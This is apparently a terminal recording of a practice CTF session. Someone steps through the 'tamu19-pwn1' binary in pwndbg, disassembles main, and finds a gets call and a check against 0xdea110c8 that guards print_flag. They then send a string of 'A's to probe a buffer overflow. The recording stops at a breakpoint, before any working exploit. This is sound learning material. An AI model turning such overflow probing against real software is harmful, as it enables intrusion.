[67.890986, "o", "\u001b[0m01\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0004\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-004 \u001b[33m0xffffcd94\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n\u001b[0m02\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0008\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1mebp\u001b[0m \u001b[33m0xffffcd98\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m03\u001b[0m\u001b[0m:\u001b[0m\u001b[0m000c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m+004 \u001b[33m0xffffcd9c\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[31m0xf7d8ccc3\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x10\u001b[39m\r\n\u001b[0m04\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0010\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m+008 \u001b[33m0xffffcda0\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m05\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0014\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m+00c \u001b[33m0xffffcda4\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffce64\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffd044\u001b[0m\u001b[0m ◂— \u001b[0m'/home/himanshu/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1/pwn1'\r\n\u001b[0m06\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0018\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m+010 \u001b[33m0xffffcda8\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[31m0xf7da6029\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mebx\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x1f4deb\u001b[39m\r\n\u001b[0m07\u001b[0m\u001b[0m:\u001b[0m\u001b[0m001c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m+014 \u001b[33m0xffffcdac\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[31m0xf7d8ccc3\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x10\u001b[39m\r\n\u001b[34m───────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────\u001b[0m\r\n ► 0 0x56555788 main+15\r\n   1 0xf7d8ccc3 None\r\n   2 0xf7d8cd88 __libc_start_main+136\r\n"]
[67.891117, "o", "   3 0x565555f1 _start+49\r\n\u001b[34m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\r\n"]
[67.891238, "o", "\u001b[?2004l\r\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[68.73949, "o", "d"]
[68.835775, "o", "i"]
[69.01095, "o", "s"]
[69.449707, "o", "s"]
[69.873351, "o", "\b\u001b[K"]
[69.969979, "o", "a"]
[70.121203, "o", "s"]
[70.272057, "o", "s"]
[70.397703, "o", " "]
[70.594634, "o", "m"]
[70.715704, "o", "a"]
[70.750534, "o", "i"]
[70.853383, "o", "n"]
[71.11598, "o", "\r\n\u001b[?2004l\r"]
[71.116229, "o", "Dump of assembler code for function \u001b[33mmain\u001b[m:\r\n"]
[71.116303, "o", "   \u001b[34m0x56555779\u001b[m <+0>:\t\u001b[32mlea    \u001b[m\u001b[31mecx\u001b[m,[\u001b[31mesp\u001b[m+\u001b[34m0x4\u001b[m]\r\n   \u001b[34m0x5655577d\u001b[m <+4>:\t\u001b[32mand    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xfffffff0\u001b[m\r\n   \u001b[34m0x56555780\u001b[m <+7>:\t\u001b[32mpush   \u001b[mDWORD PTR [\u001b[31mecx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x4\u001b[m]\r\n"]
[71.116524, "o", "   \u001b[34m0x56555783\u001b[m <+10>:\t\u001b[32mpush   \u001b[m\u001b[31mebp\u001b[m\r\n   \u001b[34m0x56555784\u001b[m <+11>:\t\u001b[32mmov    \u001b[m\u001b[31mebp\u001b[m,\u001b[31mesp\u001b[m\r\n   \u001b[34m0x56555786\u001b[m <+13>:\t\u001b[32mpush   \u001b[m\u001b[31mebx\u001b[m\r\n   \u001b[34m0x56555787\u001b[m <+14>:\t\u001b[32mpush   \u001b[m\u001b[31mecx\u001b[m\r\n=> \u001b[34m0x56555788\u001b[m <+15>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x40\u001b[m\r\n   \u001b[34m0x5655578b\u001b[m <+18>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555600\u001b[m <\u001b[33m__x86.get_pc_thunk.bx\u001b[m>\r\n   \u001b[34m0x56555790\u001b[m <+23>:\t\u001b[32madd    \u001b[m\u001b[31mebx\u001b[m,\u001b[34m0x1820\u001b[m\r\n   \u001b[34m0x56555796\u001b[m <+29>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31mebx\u001b[m+\u001b[34m0x44\u001b[m]\r\n"]
[71.116581, "o", "   \u001b[34m0x5655579c\u001b[m <+35>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31meax\u001b[m]\r\n   \u001b[34m0x5655579e\u001b[m <+37>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x565557a0\u001b[m <+39>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n"]
[71.116645, "o", "   \u001b[34m0x565557a2\u001b[m <+41>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2\u001b[m\r\n   \u001b[34m0x565557a4\u001b[m <+43>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.116843, "o", "   \u001b[34m0x565557a5\u001b[m <+44>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555580\u001b[m <\u001b[33msetvbuf@plt\u001b[m>\r\n   \u001b[34m0x565557aa\u001b[m <+49>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557ad\u001b[m <+52>:\t\u001b[32mmov    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0xc\u001b[m],\u001b[34m0x2\u001b[m\r\n   \u001b[34m0x565557b4\u001b[m <+59>:\t\u001b[32mmov    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x10\u001b[m],\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x565557bb\u001b[m <+66>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n"]
[71.11692, "o", "   \u001b[34m0x565557be\u001b[m <+69>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1620\u001b[m]\r\n   \u001b[34m0x565557c4\u001b[m <+75>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557c5\u001b[m <+76>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n"]
[71.11699, "o", "   \u001b[34m0x565557ca\u001b[m <+81>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557cd\u001b[m <+84>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x565557d0\u001b[m <+87>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x15b5\u001b[m]\r\n"]
[71.117197, "o", "   \u001b[34m0x565557d6\u001b[m <+93>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557d7\u001b[m <+94>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x565557dc\u001b[m <+99>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557df\u001b[m <+102>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31mebx\u001b[m+\u001b[34m0x40\u001b[m]\r\n   \u001b[34m0x565557e5\u001b[m <+108>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31meax\u001b[m]\r\n   \u001b[34m0x565557e7\u001b[m <+110>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n"]
[71.117496, "o", "   \u001b[34m0x565557ea\u001b[m <+113>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.117688, "o", "   \u001b[34m0x565557eb\u001b[m <+114>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2b\u001b[m\r\n   \u001b[34m0x565557ed\u001b[m <+116>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x565557f0\u001b[m <+119>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557f1\u001b[m <+120>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555530\u001b[m <\u001b[33mfgets@plt\u001b[m>\r\n   \u001b[34m0x565557f6\u001b[m <+125>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557f9\u001b[m <+128>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n   \u001b[34m0x565557fc\u001b[m <+131>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x159f\u001b[m]\r\n   \u001b[34m0x56555802\u001b[m <+137>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555803\u001b[m <+138>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x56555806\u001b[m <+141>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555807\u001b[m <+142>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555510\u001b[m <\u001b[33mstrcmp@plt\u001b[m>\r\n   \u001b[34m0x5655580c\u001b[m <+147>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x5655580f\u001b[m <+150>:\t\u001b[32mtest   \u001b[m\u001b[31meax\u001b[m,\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555811\u001b[m <+152>:\t\u001b[32mje     \u001b[m\u001b[34m0x5655582f\u001b[m <\u001b[33mmain\u001b[m+182>\r\n   \u001b[34m0x56555813\u001b[m <+154>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555816\u001b[m <+157>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1584\u001b[m]\r\n   \u001b[34m0x5655581c\u001b[m <+163>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.117849, "o", "   \u001b[34m0x5655581d\u001b[m <+164>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x56555822\u001b[m <+169>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555825\u001b[m <+172>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n"]
[71.118025, "o", "   \u001b[34m0x56555828\u001b[m <+175>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x5655582a\u001b[m <+177>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555560\u001b[m <\u001b[33mexit@plt\u001b[m>\r\n   \u001b[34m0x5655582f\u001b[m <+182>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555832\u001b[m <+185>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1564\u001b[m]\r\n   \u001b[34m0x56555838\u001b[m <+191>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555839\u001b[m <+192>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n"]
[71.118115, "o", "   \u001b[34m0x5655583e\u001b[m <+197>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555841\u001b[m <+200>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31mebx\u001b[m+\u001b[34m0x40\u001b[m]\r\n   \u001b[34m0x56555847\u001b[m <+206>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31meax\u001b[m]\r\n   \u001b[34m0x56555849\u001b[m <+208>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n"]
[71.118204, "o", "   \u001b[34m0x5655584c\u001b[m <+211>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.118458, "o", "   \u001b[34m0x5655584d\u001b[m <+212>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2b\u001b[m\r\n   \u001b[34m0x5655584f\u001b[m <+214>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x56555852\u001b[m <+217>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555853\u001b[m <+218>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555530\u001b[m <\u001b[33mfgets@plt\u001b[m>\r\n   \u001b[34m0x56555858\u001b[m <+223>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x5655585b\u001b[m <+226>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n   \u001b[34m0x5655585e\u001b[m <+229>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x154d\u001b[m]\r\n   \u001b[34m0x56555864\u001b[m <+235>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555865\u001b[m <+236>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x56555868\u001b[m <+239>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.118522, "o", "   \u001b[34m0x56555869\u001b[m <+240>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555510\u001b[m <\u001b[33mstrcmp@plt\u001b[m>\r\n   \u001b[34m0x5655586e\u001b[m <+245>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555871\u001b[m <+248>:\t\u001b[32mtest   \u001b[m\u001b[31meax\u001b[m,\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555873\u001b[m <+250>:\t\u001b[32mje     \u001b[m\u001b[34m0x56555891\u001b[m <\u001b[33mmain\u001b[m+280>\r\n"]
[71.118753, "o", "   \u001b[34m0x56555875\u001b[m <+252>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555878\u001b[m <+255>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1584\u001b[m]\r\n   \u001b[34m0x5655587e\u001b[m <+261>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x5655587f\u001b[m <+262>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x56555884\u001b[m <+267>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555887\u001b[m <+270>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x5655588a\u001b[m <+273>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x5655588c\u001b[m <+275>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555560\u001b[m <\u001b[33mexit@plt\u001b[m>\r\n"]
[71.118805, "o", "   \u001b[34m0x56555891\u001b[m <+280>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555894\u001b[m <+283>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1534\u001b[m]\r\n   \u001b[34m0x5655589a\u001b[m <+289>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.11895, "o", "   \u001b[34m0x5655589b\u001b[m <+290>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x565558a0\u001b[m <+295>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565558a3\u001b[m <+298>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x565558a6\u001b[m <+301>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x565558a9\u001b[m <+304>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[71.119075, "o", "   \u001b[34m0x565558aa\u001b[m <+305>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555520\u001b[m <\u001b[33mgets@plt\u001b[m>\r\n   \u001b[34m0x565558af\u001b[m <+310>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n"]
[71.119147, "o", "   \u001b[34m0x565558b2\u001b[m <+313>:\t\u001b[32mcmp    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x10\u001b[m],\u001b[34m0xdea110c8\u001b[m\r\n   \u001b[34m0x565558b9\u001b[m <+320>:\t\u001b[32mjne    \u001b[m\u001b[34m0x565558c2\u001b[m <\u001b[33mmain\u001b[m+329>\r\n   \u001b[34m0x565558bb\u001b[m <+322>:\t\u001b[32mcall   \u001b[m\u001b[34m0x565556fd\u001b[m <\u001b[33mprint_flag\u001b[m>\r\n   \u001b[34m0x565558c0\u001b[m <+327>:\t\u001b[32mjmp    \u001b[m\u001b[34m0x565558d4\u001b[m <\u001b[33mmain\u001b[m+347>\r\n   \u001b[34m0x565558c2\u001b[m <+329>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n"]
[71.119293, "o", "   \u001b[34m0x565558c5\u001b[m <+332>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1584\u001b[m]\r\n   \u001b[34m0x565558cb\u001b[m <+338>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565558cc\u001b[m <+339>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x565558d1\u001b[m <+344>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n"]
[71.119449, "o", "   \u001b[34m0x565558d4\u001b[m <+347>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x565558d9\u001b[m <+352>:\t\u001b[32mlea    \u001b[m\u001b[31mesp\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x8\u001b[m]\r\n   \u001b[34m0x565558dc\u001b[m <+355>:\t\u001b[32mpop    \u001b[m\u001b[31mecx\u001b[m\r\n   \u001b[34m0x565558dd\u001b[m <+356>:\t\u001b[32mpop    \u001b[m\u001b[31mebx\u001b[m\r\n   \u001b[34m0x565558de\u001b[m <+357>:\t\u001b[32mpop    \u001b[m\u001b[31mebp\u001b[m\r\n   \u001b[34m0x565558df\u001b[m <+358>:\t\u001b[32mlea    \u001b[m\u001b[31mesp\u001b[m,[\u001b[31mecx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x4\u001b[m]\r\n   \u001b[34m0x565558e2\u001b[m <+361>:\t\u001b[32mret\u001b[m\r\nEnd of assembler dump.\r\n"]
[71.119792, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[76.752067, "o", "b"]
[76.922678, "o", " "]
[77.184412, "o", "*"]
[77.825486, "o", "\u001b[7m0x565558b9\u001b[27m"]
[78.706141, "o", "\b\b\b\b\b\b\b\b\b\b0x565558b9\r\n\u001b[?2004l\r"]
[78.706426, "o", "Breakpoint 2 at \u001b[34m0x565558b9\u001b[m\r\n"]
[78.706642, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[79.71993, "o", "c"]
[79.873871, "o", "\r\n\u001b[?2004l\r"]
[79.873945, "o", "Continuing.\r\n"]
[79.875232, "o", "Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.\r\nWhat... is your name?\r\n"]
[86.328209, "o", "Sir Lancelot of Camelot"]
[88.00348, "o", "\r\n"]
[88.003608, "o", "What... is your quest?\r\n"]
[99.811574, "o", "To seek the Holy Grail."]
[100.419343, "o", "\r\n"]
[100.419437, "o", "What... is my secret?\r\n"]
[103.051647, "o", "A"]
[103.55239, "o", "A"]
[103.583889, "o", "A"]
[103.614017, "o", "A"]
[103.643827, "o", "A"]
[103.674079, "o", "A"]
[103.705099, "o", "A"]
[103.734884, "o", "A"]
[103.765518, "o", "A"]
[103.795123, "o", "A"]
[103.825966, "o", "A"]
[103.855381, "o", "A"]
[103.886192, "o", "A"]
[103.916043, "o", "A"]
[103.94554, "o", "A"]
[103.976665, "o", "A"]
[104.007772, "o", "A"]
[104.038179, "o", "A"]
[104.068362, "o", "A"]
[104.0983, "o", "A"]
[104.12841, "o", "A"]
[104.158806, "o", "A"]
[104.189588, "o", "A"]
[104.2202, "o", "A"]
[104.250081, "o", "A"]
[104.280487, "o", "A"]
[104.31074, "o", "A"]
[104.341397, "o", "A"]
[104.371075, "o", "A"]
[104.402131, "o", "A"]
[104.938929, "o", "\r\n"]
[104.939677, "o", "\r\nBreakpoint 2, \u001b[34m0x565558b9\u001b[m in \u001b[33mmain\u001b[m ()\r\n"]
[104.941516, "o", "\u001b[?2004h"]
[104.959075, "o", "LEGEND: \u001b[33mSTACK\u001b[0m | \u001b[34mHEAP\u001b[0m | \u001b[31mCODE\u001b[0m | \u001b[35mDATA\u001b[0m | \u001b[4m\u001b[31mWX\u001b[0m\u001b[4m\u001b[0m | \u001b[0mRODATA\u001b[0m\r\n\u001b[34m──────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────\u001b[0m\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEAX \u001b[0m\u001b[31m\u001b[0m \u001b[33m0xffffcd5d\u001b[0m\u001b[0m ◂— \u001b[0m'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEBX \u001b[0m\u001b[31m\u001b[0m \u001b[0m0x56556fb0 (_GLOBAL_OFFSET_TABLE_)\u001b[0m\u001b[0m ◂— \u001b[0m0x1eb8\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mECX \u001b[0m\u001b[31m\u001b[0m \u001b[35m0xf7f9c8ec\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEDX \u001b[0m\u001b[31m\u001b[0m 0\r\n \u001b[1mEDI \u001b[0m \u001b[0m0xf7ffcb60 (_rtld_global_ro)\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mESI \u001b[0m \u001b[31m0x565558f0 (__libc_csu_init)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n \u001b[1mEBP \u001b[0m \u001b[33m0xffffcd98\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mESP \u001b[0m\u001b[31m\u001b[0m \u001b[33m0xffffcd50\u001b[0m\u001b[0m ◂— \u001b[0m0x20 /* ' ' */\r\n"]
[104.95939, "o", "\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEIP \u001b[0m\u001b[31m\u001b[0m \u001b[31m0x565558b9 (main+320)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mjne\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m\u001b[31mmain+329\u001b[0m\u001b[39m\r\n\u001b[34m────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────\u001b[0m\r\n ► \u001b[1m\u001b[32m0x565558b9\u001b[0m\u001b[1m\u001b[0m \u001b[1m\u001b[32m<main+320> \u001b[0m\u001b[1m\u001b[0m \u001b[32m✔ \u001b[0m\u001b[1m\u001b[32m\u001b[38;5;148m\u001b[1mjne\u001b[0m\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;141m\u001b[31mmain+329\u001b[0m\u001b[1m\u001b[32m\u001b[39m\u001b[0m\u001b[1m\u001b[0m                    <\u001b[31mmain+329\u001b[0m>\r\n\u001b[0m    ↓\u001b[0m\r\n   \u001b[0m0x565558c2\u001b[0m \u001b[0m<main+329> \u001b[0m   \u001b[38;5;148msub\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0xc\u001b[39m                \u001b[31m\u001b[1mESP\u001b[0m\u001b[31m\u001b[0m => \u001b[33m0xffffcd44\u001b[0m (0xffffcd50 - 0xc)\r\n   \u001b[0m0x565558c5\u001b[0m \u001b[0m<main+332> \u001b[0m   \u001b[38;5;148mlea\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;81mebx\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m-\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x1584\u001b[39m\u001b[38;5;15m]\u001b[39m     \u001b[31m\u001b[1mEAX\u001b[0m\u001b[31m\u001b[0m => \u001b[31m0x56555a2c\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mdec\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mecx\u001b[39m /* \"I don't know that! Auuuuuuuugh!\" */\r\n   \u001b[0m0x565558cb\u001b[0m \u001b[0m<main+338> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;81meax\u001b[39m\r\n"]
